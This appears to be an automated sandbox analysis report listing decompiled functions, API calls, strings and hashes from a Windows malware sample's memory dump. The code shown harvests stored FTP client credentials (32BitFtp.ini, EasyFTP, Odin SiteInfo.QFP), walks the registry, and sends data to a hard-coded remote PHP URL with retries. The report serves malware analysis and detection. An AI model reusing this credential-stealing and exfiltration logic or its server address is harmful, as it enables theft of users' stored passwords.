Opcode Fuzzy Hash: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
Instruction Fuzzy Hash: B5F08C71608508AAE740FBB7DC03BCA35A26B4035CF00803BB418A91E3DEFC99C0966D

Uniqueness

Uniqueness Score: -1.00%

Function 004105CE, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004105CE(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
				char _v20;
				char _v24;
				char* _v28;
				char* _v32;
				void* _t28;
				char* _t34;
				char* _t36;
				char* _t39;
				void* _t41;
				signed int _t44;
				char* _t45;

				_t41 = __ecx;
				_t44 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_t39 = 0; // executed
				E00403DDB(); // executed
				_v24 = 0;
				_t28 = E00401000( &_v24, _t44,  &_v24);
				if(_v24 == 0) {
					_t28 = E00401000( &_v24, _t44,  &_v24);
					if(_v24 == 0) {
						_t28 = E00401000( &_v24, _t44,  &_v24);
					}
				}
				_t49 = _v24;
				if(_v24 == 0) {
					L23:
					E00401019(_t28, _t44, _v24);
					return _t39;
				}
				_t28 = E00410598( &_v20, _t44, _t49, _v24,  &_v20); // executed
				if(_t28 == 1) {
					_t45 = "http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php";
					while( *_t45 != 0) {
						_t39 = _t39;
						if(_t39 == 0) {
							_v32 = 0xa;
							while(1) {
								_v28 = 0;
								_t34 = E00403D77(_t45, _v24,  &_v28);
								_t35 = _t34;
								__eflags = _t34;
								if(_t34 != 0) {
									__eflags = _v28;
									if(_v28 != 0) {
										_t39 = _t35;
										__eflags = _t39;
										if(_t39 == 0) {
											_t36 = E00401ADD(_t41, _t44, _v28);
											_t35 = _t36;
											__eflags = _t36;
											if(_t36 != 0) {
												_t39 = _t35;
											}
										}
									}
								}
								_t28 = E00401019(_t35, _t44, _v28);
								_t39 = _t39;
								__eflags = _t39;
								if(_t39 != 0) {
									break;
								}
								__eflags = _v32;
								if(_v32 == 0) {
									break;
								}
								_v32 = _v32 - 1;
								Sleep(0x1388);
							}
							while(1) {
								__eflags =  *_t45;
								if( *_t45 == 0) {
									break;
								}
								_t45 =  &(_t45[1]);
								__eflags = _t45;
							}
							_t45 =  &(_t45[1]);
							__eflags = _t45;
							continue;
						}
						break;
					}
					_t39 = _t39;
					if(_t39 != 0) {
						_t28 = E0040260B("Client Hash",  &_v20, 0x10);
					}
				}
			}

APIs

Part of subcall function 00403DDB: WSAStartup.WSOCK32(00000101,?,?,004105E3), ref: 00403DF0

Part of subcall function 00401000: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

Sleep.KERNEL32(00001388,00000000,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php,00000000,00000000,00000000,?,00000000), ref: 0041069A

Strings

Client Hash, xrefs: 004106BD
http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php, xrefs: 00410630, 0041064C

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateGlobalSleepStartupStream
String ID: Client Hash$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
API String ID: 2508568950-3662113661
Opcode ID: f0b6a763dae928a88389b0168ced2d1e121f0d2e0d3ce774c55b3d860debcad4
Instruction ID: cb183f18291e62fb3d84bfda98949270a7e3c9ace301d4c5e7352435445e4723
Opcode Fuzzy Hash: f0b6a763dae928a88389b0168ced2d1e121f0d2e0d3ce774c55b3d860debcad4
Instruction Fuzzy Hash: 78315071A0020ADADF21ABE1CD867FF7678AB80308F14443BF140B1191D7FD49E69B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409CF4, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00409CF4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t8;
				char* _t11;
				void* _t21;
				char* _t22;
				char* _t23;

				_t21 = __edx;
				_v8 = E0040150D(_a4, 0x2a, 0);
				_t8 = E00401DCE(__eflags, 0); // executed
				_t9 = _t8;
				if(_t8 != 0) {
					E00404131(_a4, _t9, "SiteInfo.QFP", 0xbeef0000); // executed
					E004017D5(_t9);
				}
				_t23 =  *0x414082; // 0x0
				_t22 =  *0x414086; // 0x0
				if( *_t22 != 0) {
					do {
						_t11 = StrStrIA(_t22, "Odin");
						_t27 = _t11;
						if(_t11 != 0) {
							E00404131(_a4, E0040234A(_t27, _t23), "SiteInfo.QFP", 0xbeef0000);
							E004017D5(_t14);
						}
						while( *_t23 != 0) {
							_t23 = _t23 + 1;
							__eflags = _t23;
						}
						_t23 = _t23 + 1;
						asm("cld");
						asm("repne scasb");
						_t29 =  *_t22;
					} while ( *_t22 != 0);
				}
				return E00401553(_t21, _t29, _a4, _v8);
			}

APIs

StrStrIA.SHLWAPI(00000000,Odin), ref: 00409D46

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Odin, xrefs: 00409D40
SiteInfo.QFP, xrefs: 00409D1C, 00409D5B

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocal
String ID: Odin$SiteInfo.QFP
API String ID: 2826327444-4277389770
Opcode ID: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
Instruction ID: 79767c209d95ddd877970eb40065194a0b0cfa7ade53a59ec305b62fc9be4706
Opcode Fuzzy Hash: 486d78c053051990349350fdd91b5bb596df03b5f066a6875e7bab6376395dd3
Instruction Fuzzy Hash: FF01F9B0590509BAEB112B628C02FAF7E69DFD0324F24013BF945B51E3E67C5E81C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004073FE, Relevance: 4.6, APIs: 3, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073FE(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				char _v2072;
				long _t24;
				long _t25;
				intOrPtr _t32;

				_t24 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t25 = _t24;
				if(_t25 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumValueA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_t32 = E00401C8E(_a8, _a12,  &_v2064,  &_v2072);
						_v2068 = _t32;
						if(_t32 != 0 && _v2072 != 0) {
							E00403DF7(_a4, _v2068, _v2072, 0xbeef0000);
						}
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t25;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407411
RegEnumValueA.ADVAPI32 ref: 00407445
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004074A8

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID:
API String ID: 4012628704-0
Opcode ID: 42bae9d64bc14adbe7c505520da77a2bdc85f37b94bdbed708d92a08561d89be
Instruction ID: 225cf3d4d1326567d8f11672761244bf4029b44a97f31c33bb7786e48f251d91
Opcode Fuzzy Hash: 42bae9d64bc14adbe7c505520da77a2bdc85f37b94bdbed708d92a08561d89be
Instruction Fuzzy Hash: 8F111C7290410CBADF219F90CC42BDDBBB9BF04304F14C0B6B614B51A1DB79ABA59F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F439, Relevance: 4.6, APIs: 3, Instructions: 50
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F439(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, CHAR* _a16) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t22;
				long _t23;
				void* _t35;

				_t35 = __ecx;
				_t22 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t23 = _t22;
				if(_t23 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D69(E00401D15(_a12, "\\"),  &_v2064), _a16);
						E0040F39C(_t35, _a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t23;
			}

0x0040f439
0x0040f44c
0x0040f451
0x0040f453
0x0040f459
0x0040f460
0x0040f460
0x0040f487
0x00000000
0x00000000
0x0040f4b0
0x0040f4c2
0x0040f4cd
0x0040f4d2
0x0040f4d2
0x00000000
0x0040f4da
0x0040f4e0

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F44C
RegEnumKeyExA.ADVAPI32 ref: 0040F480
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F4DA

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: e9242cb9ed46c0c39858401af4aa055005035ce50c69c14a5bc6c187560411f2
Instruction ID: 735606c21c6a6d191ae9bd649b31301a7bdc0d160cf88c939fc3181304d95fd7
Opcode Fuzzy Hash: e9242cb9ed46c0c39858401af4aa055005035ce50c69c14a5bc6c187560411f2
Instruction Fuzzy Hash: 9411127590010CBADF21AFA1CC02FEE7B79BF04304F1080B6BA15B55E1DB79AA959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F39C, Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F39C(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t21;
				long _t22;
				void* _t33;

				_t33 = __ecx;
				_t21 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t22 = _t21;
				if(_t22 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D69(E00401D15(_a12, "\\"),  &_v2064);
						E0040F207(_t33, _a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t22;
			}

0x0040f39c
0x0040f3af
0x0040f3b4
0x0040f3b6
0x0040f3b8
0x0040f3bf
0x0040f3bf
0x0040f3e6
0x00000000
0x00000000
0x0040f406
0x0040f418
0x0040f423
0x0040f428
0x0040f428
0x00000000
0x0040f430
0x0040f436

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3AF
RegEnumKeyExA.ADVAPI32 ref: 0040F3DF
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F430

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: 85ea17fe629e96005b83fc01d60c1d61f73045964fd9db03a3ddf3eed5f4685f
Instruction ID: ef60cf3e78cb170a6f642b347f899af58aef4bd76c3f3cdf9285c2581eedf16e
Opcode Fuzzy Hash: 85ea17fe629e96005b83fc01d60c1d61f73045964fd9db03a3ddf3eed5f4685f
Instruction Fuzzy Hash: 5F01217690010CBADF21AF91CC42FEE7B79BF04304F1080B6BA14B51E1DB79AA959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBD9, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CBD9(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _v12;
				char* _t11;
				char* _t12;
				char* _t14;
				void* _t20;
				void* _t21;

				_t21 = __edx;
				_t20 = __ecx;
				_v8 = E0040150D(_a4, 0x43, 0);
				_t11 = E00401C8E(0x80000002, "SOFTWARE\\Classes\\TypeLib\\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\\1.2\\0\\win32", 0, 0); // executed
				_t12 = _t11;
				if(_t12 != 0) {
					_v12 = _t12;
					_t14 = StrStrIA(_v12, "EasyFTP");
					_t23 = _t14;
					if(_t14 != 0) {
						E00403F86(_t20, _a4, E0040234A(_t23, _v12), 0, 0xbeef0000, E0040CB8D);
						E004017D5(_t17);
					}
					E004017D5(_v12);
				}
				return E00401553(_t21, _t23, _a4, _v8);
			}

0x0040cbd9
0x0040cbd9
0x0040cbeb
0x0040cbfc
0x0040cc01
0x0040cc03
0x0040cc05
0x0040cc10
0x0040cc15
0x0040cc17
0x0040cc32
0x0040cc37
0x0040cc37
0x0040cc3f
0x0040cc3f
0x0040cc50

APIs

StrStrIA.SHLWAPI(?,EasyFTP,80000002,SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32,00000000,00000000), ref: 0040CC10

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CBF2
EasyFTP, xrefs: 0040CC08

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
API String ID: 1884169789-2776585315
Opcode ID: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
Instruction ID: 833bec486d2f115b47918bfa30de8f6535c6fd2c173ee2e59642ce28720d77dd
Opcode Fuzzy Hash: 63f6b9c7b0b6ac1dc6c00c8d6c22b0c76bec622ec5f32ca3d0dd6b1c66588ab7
Instruction Fuzzy Hash: 6DF06D70A90208BAEF117BA2CC43FAD7D359B10714F20413B7A05781F2EABD9B51D65C

Uniqueness

Uniqueness Score: -1.00%

Function 00401DCE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401DCE(void* __eflags, signed int _a4) {
				intOrPtr _v8;
				void* _t12;
				intOrPtr _t19;
				intOrPtr* _t21;

				_v8 = E004017EC(0x105);
				if( *0x41446f != 0) {
					_t12 =  *0x41446f(0, _a4, 0, 0, _v8); // executed
					if(_t12 < 0) {
						goto L3;
					}
				} else {
					L3:
					E004017D5(_v8);
					_v8 = 0;
					_t21 = 0x414473;
					while( *_t21 != 0) {
						_t20 =  *_t21;
						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
							L7:
							_t21 = _t21 + 4;
							continue;
						} else {
							_t19 = E00401C8E( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
							if(_t19 == 0) {
								goto L7;
							} else {
								_v8 = _t19;
							}
						}
						goto L9;
					}
				}
				L9:
				return _v8;
			}

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401DF9

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401E2E

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocFolderLocalPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 1254228173-2036018995
Opcode ID: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
Instruction ID: a3ddda74c67e5e51f847a673abce941a0f793803ed09e317935be1dd6252c98b
Opcode Fuzzy Hash: adfc9d6224a73f74d039f8ed0ef042fe7e0f9fa600f4b871ee7a2a7eaa3ba91d
Instruction Fuzzy Hash: 82017136A00205EBDB119B90CC02B9EB7B5AB44314F244177EA01BB1E0E7789B50DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00407C91, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C91(void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				int _t11;
				void* _t17;

				_t17 = __edx;
				_v8 = E0040150D(_a4, 0x1d, 0);
				_t11 = GetWindowsDirectoryA( &_v269, 0x104);
				if(_t11 != 0) {
					_t19 = _t11 - 0x104;
					if(_t11 <= 0x104) {
						E00403E4C(_a4, E00401D15( &_v269, "\\32BitFtp.ini"), 0xbeef0000); // executed
						E004017D5(_t14);
					}
				}
				return E00401553(_t17, _t19, _a4, _v8);
			}

0x00407c91
0x00407ca6
0x00407cba
0x00407cbc
0x00407cbe
0x00407cc3
0x00407ce0
0x00407ce5
0x00407ce5
0x00407cc3
0x00407cf6

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407CB5

Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

\32BitFtp.ini, xrefs: 00407CC5

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
String ID: \32BitFtp.ini
API String ID: 2776971706-1260517637
Opcode ID: b3e70544b5a816539d331a8b847fad65a44d3590d7f9617276f2fb9bdd921a6c
Instruction ID: 2195aeeb4991f3a6115ba96b76fa21cbd29fe7e13ab62e4599c67b56f028ae1e
Opcode Fuzzy Hash: b3e70544b5a816539d331a8b847fad65a44d3590d7f9617276f2fb9bdd921a6c
Instruction Fuzzy Hash: 91F08270900108BAEF11BAA1CC42FDD7A69AB40748F104037B605B51E2EAB8AA809A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00410C10, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410C10(signed int __eax, void* __ecx, signed int __edx, void* __eflags) {
				char _v8;
				void* _t6;
				signed int _t8;
				int _t9;
				signed int _t10;
				void* _t11;
				void* _t12;

				_t17 = __eflags;
				_t13 = __ecx;
				_t16 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_v8 = 0;
				_t6 = E00410B60( &_v8, __ecx, __edx ^ __eax ^ __eax ^ __edx ^ __eax, __eflags,  &_v8); // executed
				_t8 = E00402D9C(E00410331(_t6, _t16), "samantha"); // executed
				_t9 = E004105CE(_t8, _t13, _t16, _t17); // executed
				if( *0x414616 != 0) {
					_t19 =  *0x414409;
					if( *0x414409 != 0) {
						_t9 = RevertToSelf();
					}
					 *0x4140fe = 0x80000001; // executed
				}
				_t10 = E0041088B(_t9, _t16); // executed
				_t11 = E0041098D(_t10, _t13, _t16); // executed
				_t12 = E004106D5(_t11, _t16, _t19); // executed
				return _t12;
			}

0x00410c10
0x00410c10
0x00410c1a
0x00410c1c
0x00410c27
0x00410c36
0x00410c3b
0x00410c47
0x00410c49
0x00410c50
0x00410c52
0x00410c52
0x00410c58
0x00410c58
0x00410c62
0x00410c67
0x00410c6c
0x00410c72

APIs

Part of subcall function 00410B60: OleInitialize.OLE32(00000000), ref: 00410B6E
Part of subcall function 00410B60: GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1

RevertToSelf.ADVAPI32(samantha,00000000), ref: 00410C52

Strings

samantha, xrefs: 00410C31

Memory Dump Source

Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InitializeNameRevertSelfUser
String ID: samantha
API String ID: 1709315701-1704246511
Opcode ID: 2bbb22e90b323666dd271b49417a46309c84282a46e7ea38e24229a769747b2c
Instruction ID: ba436f915b5ba33af829729ff840d4ee844fee4bebf450b7f9e819facd392308
Opcode Fuzzy Hash: 2bbb22e90b323666dd271b49417a46309c84282a46e7ea38e24229a769747b2c
Instruction Fuzzy Hash: C2E0ED74A1020897D724FBF7994A7CE36A65B8431CF14813B7410922E2EBFC46D5CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 004023F5, Relevance: 3.0, APIs: 2, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004023F5(CHAR* _a4, _Unknown_base(*)()** _a8) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t10;
				CHAR* _t12;
				_Unknown_base(*)()** _t13;

				_t4 = LoadLibraryA(_a4); // executed
				_t5 = _t4;
				if(_t5 != 0) {
					_t12 = _a4;
					_t10 = _t5;
					_t13 = _a8;
					while(1) {
						asm("cld");
						asm("repne scasb");
						if( *_t12 == 0) {
							break;
						}
						_t8 = GetProcAddress(_t10, _t12); // executed
						_t9 = _t8;
						if(_t9 != 0) {
							 *_t13 = _t9;
							_t13 = _t13 + 4;
							continue;
						} else {
							return _t9;
						}
						goto L8;
					}
					return 1;
				} else {
					return _t5;
				}
				L8:
			}

APIs

LoadLibraryA.KERNEL32(004143E1,?,?,?,?,0040245E,ole32.dll,004143E1,00410B78), ref: 004023FE
GetProcAddress.KERNEL32(00000000,004143E1), ref: 0040242C

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 53f7fb14295c34ad7408fa00433a83a28b95298002fe2d2f9c03246ce798e358
Instruction ID: 63647a6b9d78679d1f5e0a50425ec40e01c9d34892c3e944a590a543cd3e3713
Opcode Fuzzy Hash: 53f7fb14295c34ad7408fa00433a83a28b95298002fe2d2f9c03246ce798e358
Instruction Fuzzy Hash: 7BF0B47321401416D7105A39EC8599B6B88D7E3378B105137F916B72C1E1BDDD85C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53, Relevance: 3.0, APIs: 2, Instructions: 31
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E53(CHAR* _a4) {
				char* _t4;
				void* _t6;
				void* _t11;

				_t4 = _a4;
				if(_t4 == 0 ||  *_t4 == 0) {
					return 0;
				} else {
					_t6 = CreateFileA(_a4, 0x80, 0, 0, 3, 0, 0); // executed
					_t11 = _t6 + 1;
					if(_t11 != 0) {
						CloseHandle(_t11 - 1);
						return 1;
					}
					return 0;
				}
			}

0x00401e5a
0x00401e5c
0x00401e6a
0x00401e6d
0x00401e7f
0x00401e88
0x00401e89
0x00401e8d
0x00000000
0x00401e92
0x00401e99
0x00401e99

APIs

CreateFileA.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E7F
CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401E8D

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: d52d746dd5efc15e64718a95c802bffaa35cae3bdf8338a1f0761341ce0fad8c
Instruction ID: 3c78a73ec376b71f213996ba39f05dc87e0add78c32be09080ce482926b503b4
Opcode Fuzzy Hash: d52d746dd5efc15e64718a95c802bffaa35cae3bdf8338a1f0761341ce0fad8c
Instruction Fuzzy Hash: B2E04F7239030437FB311679DC83F5A3A88A711B98F544532B641BD2D2E5FDEC80469C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5CB, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040E5CB(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				CHAR* _v8;
				char _v12;

				if( *0x414441 != 0) {
					_v8 = E004017EC(0x105);
					_v12 = 0x104;
					 *0x414441(_a8, _a8, _v8,  &_v12); // executed
					if(lstrlenA(_v8) > 3) {
						E00404131(_a4, _v8, ".xml", 0xbeef0000);
					}
					return E004017D5(_v8);
				} else {
					return __eax;
				}
			}

0x0040e5d8
0x0040e5e8
0x0040e5eb
0x0040e5ff
0x0040e610
0x0040e622
0x0040e622
0x0040e630
0x0040e5db
0x0040e5db
0x0040e5db

APIs

lstrlenA.KERNEL32(?), ref: 0040E608

Strings

.xml, xrefs: 0040E617

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: .xml
API String ID: 1659193697-2937849440
Opcode ID: 90b6cacf0cd7078945c80df2fcfd99e66fb401e0d4aadcf75266aa938aa2822d
Instruction ID: 5a1537d95f9c1f419a8a440fa280918d6c9dc7d515ed36f1139c0294ba86a765
Opcode Fuzzy Hash: 90b6cacf0cd7078945c80df2fcfd99e66fb401e0d4aadcf75266aa938aa2822d
Instruction Fuzzy Hash: 35F03A3590010CFBCF11EF91CC46ECDBB75AB54318F208166B550B51B0D77A9BA0EB49

Uniqueness

Uniqueness Score: -1.00%

Function 004013C2, Relevance: 1.5, APIs: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013C2(void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t10;
				long _t13;
				void* _t15;

				_t15 = _a8;
				while(1) {
					_t10 = WriteFile(_a4, _t15, _a12,  &_v8, 0); // executed
					if(_t10 == 0 || _v8 == 0) {
						break;
					}
					_t13 = _v8;
					_t15 = _t15 + _t13;
					_t7 =  &_a12;
					 *_t7 = _a12 - _t13;
					if( *_t7 != 0) {
						continue;
					} else {
						return 1;
					}
					L6:
				}
				return 0;
				goto L6;
			}

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004013D9

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6e3ca6acbfabcd83ac8cff14c77b57197338b33358a0f62b155115e065e0c992
Instruction ID: b2a8a1a4098528e9a7980f2ebc5f3a58106d20ece59f8725bb207e7cc5dc22b0
Opcode Fuzzy Hash: 6e3ca6acbfabcd83ac8cff14c77b57197338b33358a0f62b155115e065e0c992
Instruction Fuzzy Hash: 7AE03032910219EBDF10DEA4CC41BDF77A89B10358F044126BD14E61D0E6B5DB50C794

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00401000(signed int __eax, signed int __edx, intOrPtr _a4) {

				_push(_a4);
				_push(1);
				_push(0); // executed
				L00410DB8(); // executed
				return __eax ^ __edx ^ __eax;
			}

0x00401009
0x0040100c
0x0040100e
0x00401010
0x00401016

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,0040202B,?,?,?,?,00410BE4), ref: 00401010

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 774a49e7147280b3b20938a5452805c50a6a17f2c45d990b9c3d6a4dcf1db92f
Instruction ID: dea821b72ffdd4c679baa99983bcdd127a299b87b73cb077d53c3cab1c2398ee
